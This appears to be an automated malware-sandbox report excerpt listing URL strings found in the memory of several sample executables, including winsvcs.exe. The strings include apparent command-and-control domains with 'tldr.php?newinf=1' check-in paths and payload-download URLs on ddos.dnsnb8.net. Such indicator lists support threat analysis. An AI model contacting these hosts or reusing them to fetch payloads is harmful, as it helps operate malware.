Source: XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar:
Source: XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rarw
Source: XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar
Source: XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rarDC:
Source: XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rarT
Source: XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://eiifngjfksisiufjf.biz/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://eiifngjfksisiufjf.biz/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://eiifngjfksisiufjf.com/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://eiifngjfksisiufjf.com/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://eiifngjfksisiufjf.in/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://eiifngjfksisiufjf.in/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://eiifngjfksisiufjf.in/tldr.php?newinf=1(i0
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://eiifngjfksisiufjf.info/
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://eiifngjfksisiufjf.net/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://eiifngjfksisiufjf.net/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://eiifngjfksisiufjf.net/tldr.php?newinf=14A
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://eiifngjfksisiufjf.ru/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://eiifngjfksisiufjf.ru/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://eiifngjfksisiufjf.su/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://eiifngjfksisiufjf.su/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://eofihsishihiursgu.biz/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://eofihsishihiursgu.biz/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://eofihsishihiursgu.com/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://eofihsishihiursgu.com/eoroooskfogihisrg.com5
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://eofihsishihiursgu.com/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://eofihsishihiursgu.in/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://eofihsishihiursgu.in/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://eofihsishihiursgu.info/
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://eofihsishihiursgu.net/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://eofihsishihiursgu.net/tldr.php?newinf=1n
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://eofihsishihiursgu.net/tldr.php?newinf=1wA
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://eofihsishihiursgu.ru/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://eofihsishihiursgu.ru/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://eofihsishihiursgu.ru/tldr.php?newinf=1H1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://eofihsishihiursgu.su/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://eofihsishihiursgu.su/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://eoroooskfogihisrg.biz/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://eoroooskfogihisrg.biz/i
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://eoroooskfogihisrg.biz/tldr.php?newinf=1K
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://eoroooskfogihisrg.biz/tldr.php?newinf=1T
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://eoroooskfogihisrg.com/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://eoroooskfogihisrg.com/tldr.php?newinf=1Uo
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://eoroooskfogihisrg.com/tldr.php?newinf=1w
